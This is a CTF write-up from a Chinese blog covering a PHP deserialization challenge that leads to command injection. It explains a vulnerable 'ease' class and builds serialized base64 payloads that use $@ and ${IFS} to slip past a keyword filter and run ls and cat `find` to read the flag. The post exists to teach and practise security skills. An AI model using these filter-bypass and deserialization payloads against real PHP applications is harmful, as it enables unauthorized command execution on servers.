PHP反序列化——江苏工匠杯

最新推荐文章于 2024-04-07 00:31:17 发布
最新推荐文章于 2024-04-07 00:31:17 发布
阅读量56 收藏
点赞数
分类专栏: CTF 文章标签: php android 开发语言
原文链接:https://blog.csdn.net/weixin_53912233/article/details/128154805
版权

题目:

攻防世界 (xctf.org.cn)

<?php
highlight_file(__FILE__);

class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
 
    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 
 
    function ping($ip){
        exec($ip, $result);
        var_dump($result);
    }

    function waf($str){
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            return $str;
        } else {
            echo "don't hack";
        }
    }
 
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }   
}

$ctf=@$_POST['ctf'];
@unserialize(base64_decode($ctf));
?>

 unserialize可知php反序化

分析代码:

1. `class ease{}`:这里定义了一个名为`ease`的类。

2. `private $method;`和`private $args;`:这两行声明了类中的两个私有属性`$method`和`$args`,这些属性只能在类的内部访问。

3. `function __construct($method, $args) {...}`:这是类的构造函数`__construct`,在类实例化时会被自动调用。构造函数接受两个参数`$method`和`$args`,并将它们分别赋值给类的属性`$method`和`$args`。

4. `$this->method = $method;`和`$this->args = $args;`:这两行代码将构造函数接收到的参数值分别赋给类的属性`$method`和`$args`。

1. `function __destruct(){}`:这是一个特殊的PHP魔术方法`__destruct()`,用于在对象被销毁时自动调用。当对象不再被引用时,PHP会自动调用`__destruct()`方法。

2. `if (in_array($this->method, array("ping"))) {...}`:这里使用`in_array()`函数检查`$this->method`是否在数组`array("ping")`中。如果`$this->method`的值是`ping`,则执行下面的代码块。

3. `call_user_func_array(array($this, $this->method), $this->args);`:这行代码使用`call_user_func_array()`函数动态调用对象的方法。它接受两个参数,第一个参数是一个数组,包含要调用的对象和方法名,第二个参数是一个数组,包含要传递给方法的参数。在这里,它会调用当前对象的`$this->method`方法,并传递`$this->args`作为参数。

function ping($ip){}:这是一个PHP函数的定义,函数名为ping,接受一个参数$ip

exec($ip, $result);:这行代码使用exec()函数执行系统命令,其中$ip是要执行的命令,$result是一个数组,用来存储命令执行的结果。

var_dump($result);:这行代码使用var_dump()函数输出$result数组的内容,显示数组中的元素及其类型。

function waf($str){}:这是一个PHP函数的定义,函数名为waf,接受一个参数$str

if (!preg_match_all("/(\||&|; |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {}:这行代码使用preg_match_all()函数对输入的字符串$str进行正则表达式匹配。如果字符串中不包含|&;、空格、/catflagtacphpls这些关键词,则执行下面的代码块。

return $str;:如果字符串不包含上述关键词,则直接返回原始的输入字符串$str

else { echo "don't hack"; }:如果字符串中包含上述关键词,则输出don't hack,表示不允许进行恶意操作。

function __wakeup(){}:这是PHP中的一个魔术方法__wakeup(),在反序列化对象时会自动调用该方法。

foreach($this->args as $k => $v) {}:这行代码使用foreach循环遍历对象的$this->args属性,将键值对分别赋值给变量$k$v

$this->args[$k] = $this->waf($v);:在循环中,对每个值$v进行过滤处理,调用对象的waf()方法对其进行处理,并将处理后的值重新赋给$this->args[$k]

定义了一个__wakeup()魔术方法,在对象反序列化时会对对象的$this->args属性中的每个值进行过滤处理,调用对象的waf()方法对其进行过滤,并更新属性的值

$ctf=@$_POST['ctf'];:这行代码首先尝试从$_POST数组中获取名为ctf的参数的值,并将其赋给变量$ctf。在这里使用了@符号来抑制可能的错误提示,即使获取$_POST['ctf']的值出现错误也不会抛出错误。

@unserialize(base64_decode($ctf));:这行代码对获取到的$ctf值进行处理。首先使用base64_decode()函数对$ctf进行解码,然后使用unserialize()函数对解码后的值进行反序列化操作。

作用是从$_POST请求中获取名为ctf的参数值,对该值进行base64解码后再进行反序列化操作。这种操作可能存在安全风险,因为恶意用户可以利用反序列化漏洞执行恶意代码。因此,在实际应用中需要谨慎处理用户输入数据,以防止安全漏洞的发生。

  function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }

分析可得playload:

<?php
class ease{
    private $method;
    private $args;
	
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
}
$a = new ease("ping",array('id'));
echo serialize($a)."<br>";
echo base64_encode(serialize($a));
?>

PHP 在线工具 | 菜鸟工具 (jyshare.com)运行后得

O:4:"ease":2:{s:12:"easemethod";s:4:"ping";s:10:"easeargs";a:1:{i:0;s:2:"id";}}<br>Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoyOiJpZCI7fX0=

 取<br>后字符串

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoyOiJpZCI7fX0=

用火狐hackbar

说明命令执行成功

因为下面有过滤:考虑

${IFS}             //空格绕过
$@                 //空变量

 修改playload

$a = new ease("ping",array('l$@s'));//修改payload生成代码的这一行即可

将$@插入ls中间

 运行

注意提交时字符串前加入ctf=

同样得到代码

O:4:"ease":2:{s:12:"easemethod";s:4:"ping";s:10:"easeargs";a:1:{i:0;s:4:"l$@s";}}<br>Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo0OiJsJEBzIjt9fQ==

 继续取后面的字符串

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo0OiJsJEBzIjt9fQ==

再次在hackbar中执行

发现可疑目录flag_1s_here

接下来看看它目录下的文件

find 查看当前及子目录下的所有文件

 使用cat查看find列出的文件,

重新构造playlaod

$a = new ease("ping",array('ca$@t${IFS}`find`'));//修改payload生成代码的这一行即可

 其中ca$@t${IFS}`find`

解析下来应该为 cat `find`

cat查看文件

find查找文件

反引号`用来执行命令,并将命令的输出作为字符串返回。在这里,执行find命令,用于在文件系统中查找文件

后重新生成playload

O:4:"ease":2:{s:12:"easemethod";s:4:"ping";s:10:"easeargs";a:1:{i:0;s:17:"ca$@t${IFS}`find`";}}<br>Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoxNzoiY2EkQHQke0lGU31gZmluZGAiO319

同样截取后面的字符串 

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoxNzoiY2EkQHQke0lGU31gZmluZGAiO319

在hackbar中提交

箭头即为flag

cyberpeace{7db3fb76fcfcd76a94e6d9c828a09542}

 

20_aw
关注
专栏目录
【网络安全 | CTF】记一次PHP序列化反序列化解题详析
等风来
08-24 3954
代码开门见山给出backdoor函数,而该函数在popko类的call方法中调用故需要运行call方法而call方法是在对象上下文中调用不可访问的方法时触发的故需要调用不可访问的方法 而恰巧destruct方法中并不存在a对象和a函数故需要运行destruct方法而destruct方法在对象被销毁时触发 如何实现对象被销毁呢? 当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法 所以思路就是: 在pipimi类中构造一个对象,当pipimi中的destru
【网络安全 | CTF】CTF极客大挑战2019PHP解题详析(Dirsearch+php反序列化
等风来
08-24 5189
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
ctf php审计从题目中的过滤学习绕过
eliforsharon的博客
10-10 1445
目录基本介绍空格过滤 基本介绍 在进行ping命令执行时,能够通过截断来执行新的命令。 根据此原理来进行注入。 例子如下 ip=127.0.0.1;ls 空格过滤 考虑在进行命令注入时,过滤了空格,可以采用${IFS}、$IFS、$IFS$9的局部变量来表示分隔符,但考虑$IFS直接接字母时可能会被解析成其他变量,所以采用${IFS}固定变量,或者$IFS$9采用$9这个空字符来与后面字母分隔开来固定变量 ...
CTFshow web48 49 50 51 52
ChenD的学习笔记
11-10 1140
CTFshow web48 web49 web50 web51 web52
ctfhub(rce智慧树)
qq_62046696的博客
07-21 566
刚看完rce知识点做一下题,巩固一下、
CTFSHOW-命令执行
Monica的博客
09-03 4217
WEB29 题目: <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 分析:题目过滤了flag且忽略大小写 知识点:linux通配符 * 匹配任何字符串/文本,包括空字符串;*代表任意字符..
攻防世界unseping_unseping攻防世界,网络安全面试回忆录
最新发布
2201_75604341的博客
04-07 789
function waf($str){ //waf过滤if (!} else {function __wakeup(){ 反序列化后调用这个函数,foreach($this->args as $k => $v) { //把反序列化对象中的args变量拿出来处理this−argsk] =this−wafv);//这个args是当前类中的变量所有上面的this−args与下面的this->args所指代的不一样。
Unity中的序列化和反序列化
L的博客
08-31 7106
序列化是指把对象转换为字节序列的过程,而反序列化是指把字节序列恢复为对象的过程。序列化最主要的用途就是传递对象和保存对象在Unity中保存和加载、prefab、scene、Inspector窗口、实例化预制体等都使用了序列化与反序列化。...
【网络安全 | CTF】unseping 江苏工匠
等风来
12-24 2065
构造可进行命令执行的ping命令,并经过序列化、base64加密后赋值给参数ctf。由于ctf在解码后会被反序列化,而反序列化时会执行wakeup魔术方法,即反序列化时会对ping命令中的关键字进行过滤来限制命令执行。所以我们可以使用双引号闭合等的方式进行绕过。
〖Python零基础入门篇(54)〗- 文件的应用-序列化与反序列化
热门推荐
易编橙 · 终身成长社群,相遇已是上上签!
03-25 2万+
前面章节我们学些了文件对象的创建、写入与读取,并且针对 `.py` 文件 与 `.txt` 文件进行了有针对性的小练习。 通过前面的学习我们知道,文件对象的读写只能进行 `字符串` 或 `byte` 类型的操作,其他类型只能通过格式化存储或者数据类型的转换才能实现。 但无论是哪一种,从文件中读取数据后都需要进行比较复杂的处理才能还原到原始的数据类型。为了简化数据类型的写入和获取,今天我们来学习一个新的知识点 ---> 序列化。
攻防世界——unseping(waf绕过)
weixin_48929138的博客
02-27 414
var_dump() 函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。再次编写脚本绕过防火墙执行命令cat flag_1s_here/flag_831b69012c67b35f.php。如果数组array中存在值search,则返回True,如果type(可选)为TRUE,则要求数据类型相同。这一行代码是使用了八进制绕过对**/**进行了绕过,可以编写python脚本更加快速地得到需要传入的参数。调用回调函数,并把一个数组参数作为回调函数的参数。这一段代码涉及正则匹配,起到防火墙的作用。
CTFHub 技能树 综合过滤
weixin_44732566的博客
03-08 1804
CTFHub 技能书 综合过滤 打开题目,源码已经出现了 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/"...
php 反序列注入,CTF中PHP反序列化和命令注入的一次简单利用
weixin_31796803的博客
04-07 744
代码来自第六届防灾科技学院网络安全技能大赛,侵删。php目标获取Linux服务器根目录下的flagpython代码/*home.php*/class home{private $method;private $args;function __construct($method, $args) {$this->method = $method;$this->args = $args;}f...
PHP 获取访问者的mac地址
qq_26507967的博客
03-18 6720
$result = array(); $macAddr = array(); @exec("ipconfig /all", $result);//执行Command(cmd)命令 foreach($result as $val){ if(preg_match("/[0-9a-f][0-9a-f][:-]"."[0-9a-f][0-9a-f][:-]"."[0-9a-f][0-9...
ctf+php反序列化,CTF中PHP反序列化和命令注入的一次简单利用
weixin_39912984的博客
04-02 638
代码来自第六届防灾科技学院网络安全技能大赛,侵删。目标获取Linux服务器根目录下的flag代码/*home.php*/class home{private $method;private $args;function __construct($method, $args) {$this->method = $method;$this->args = $args;}function _...
Linux文件系统--文件类型
Ucan_Uup的博客
09-08 1120
Linux中一切都是文件,文件类型有多种,使用ls -l命令可以查看文件属性,所显示结果的第一列的第一个字符用来表示文件类型,如下: 1.普通文件 第一列第一个字符为“-”的文件为普通文件。 创建普通文件我们用:touch newfile 命令 删除普通文件我们用:rm newfile 命令 2.目录文件 第一列第一个字符为“d”(directory)的文件为目录文件。 创建目录文件我们用:mkdir directory 命令 删除空目录文件我们用:rmdir directory 命令 删除非空目录文件
3 ways to serialize variables in php
weixin_34112181的博客
08-01 207
序列化是将变量转换为可保存或传输的字符串的过程;反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。1. serialize和unserialize函数这两个是序列化和反序列化PHP中数据的常用函数。 Php代码 $a=array('a'=>'Apple','b'=>...
php获取本机IP地址
xwlljn的博客
04-02 1万+
<?php function get_local_ip() { $preg = "/\A((([0-9]?[0-9])|(1[0-9]{2})|(2[0-4][0-9])|(25[0-5]))\.){3}(([0-9]?[0-9])|(1[0-9]{2})|(2[0-4][0-9])|(25[0-5]))\Z/"; //获取操作系统为win2000/xp、win7的本机IP真实地址...
江苏工匠_unseping_wp
shelter1234567的博客
10-15 6175
关键字:江苏工匠 unseping 攻防世界 ctf解题wp 网络安全
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值